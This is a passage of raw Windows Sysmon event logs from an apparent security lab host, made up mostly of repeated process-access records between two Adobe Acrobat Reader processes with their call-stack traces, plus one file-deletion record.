DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.754{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.753{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.752{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.752{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.751{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.750{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.749{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.748{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.746{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.746{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.745{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.744{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.743{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.743{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.740{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=F2A3D2CCE7E313192B41419177CCF982,SHA256=107DCCCE8FA10813D161077A35BB25885AF6657A626B058146DA0572E03D7D89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.724{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.724{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 